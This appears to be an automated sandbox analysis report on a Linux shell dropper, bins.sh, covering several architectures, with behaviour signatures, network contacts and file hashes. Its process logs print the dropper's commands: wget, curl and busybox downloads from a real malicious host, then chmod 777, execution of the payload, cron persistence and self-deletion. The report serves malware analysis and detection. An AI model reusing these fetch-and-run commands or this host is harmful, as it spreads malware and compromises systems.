Analysis Overview
SHA256
5712c96a6f61d81d03e6fadb1ab213cbced525bc1548981318d3dfe47f03c9c6
Threat Level: Shows suspicious behavior
The file bins.sh was found to show suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Renames itself
Creates/modifies Cron job
Enumerates running processes
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-12-04 20:25
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-04 20:25
Reported
2024-12-04 20:28
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
149s
Max time network
131s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| N/A | 224.0.0.251:5353 | | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| GB | 195.181.164.14:443 | | tcp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 84.17.50.9:443 | 1527653184.rsc.cdn77.org | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-04 20:25
Reported
2024-12-04 20:28
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
7s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-12-04 20:25
Reported
2024-12-04 20:28
Platform
debian9-mipsbe-20240611-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | /usr/bin/wget | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
Files
/tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c
| Hash | Value |
|---|---|
| MD5 | 6c583043d91c55aa470c08c87058e917 |
| SHA1 | abf65a5b9bba69980278ad09356e53de8bb89439 |
| SHA256 | 2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948 |
| SHA512 | 82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-12-04 20:25
Reported
2024-12-04 20:28
Platform
debian9-mipsel-20240226-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
Renames itself
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /var/spool/cron/crontabs/tmp.FUV38W | /usr/bin/crontab | N/A |
Enumerates running processes
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/9/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/16/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/684/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/115/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/485/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/828/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/12/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/14/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/19/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/79/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/831/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/18/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/23/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/105/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/13/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/144/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/37/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/372/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/705/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/1/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/7/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/2/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/20/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/36/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/73/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/704/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/385/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/6/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/70/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/76/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/317/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/343/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/707/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/74/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/152/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/344/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/408/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/69/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/224/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/311/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/373/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/825/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/17/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/21/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/22/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/78/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/116/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/384/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/829/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/4/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/5/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/15/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/83/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/168/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/703/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/710/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/826/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/3/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/8/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/24/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/77/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | /usr/bin/wget | N/A |
| File opened for modification | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | /usr/bin/curl | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
/bin/chmod
[chmod 777 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
/tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c
[./3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
/bin/sh
[sh -c crontab -l]
/usr/bin/crontab
[crontab -l]
/bin/sh
[sh -c crontab -]
/usr/bin/crontab
[crontab -]
/bin/rm
[rm 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV8]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:443 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
Files
/tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c
| Hash | Value |
|---|---|
| MD5 | 6c583043d91c55aa470c08c87058e917 |
| SHA1 | abf65a5b9bba69980278ad09356e53de8bb89439 |
| SHA256 | 2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948 |
| SHA512 | 82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5 |
/var/spool/cron/crontabs/tmp.FUV38W
| Hash | Value |
|---|---|
| MD5 | 7efe52b2de6e71ac50b770cf32218aac |
| SHA1 | ade25d2ddfbbbf690febf439ab6c9be4b484d402 |
| SHA256 | c81fa91db4d9fa0605ef5576fa0e3bc4fb94f0ece0fa242c1e8fabf826f91d15 |
| SHA512 | f96c20247d84eed1819b80526f6671b3350cd908be62eda99e9392e0716735ba9b3b43f54bbf314ee1b188cdfb6bc1e21d16f27e10d52ef01b0bb57f3d74604f |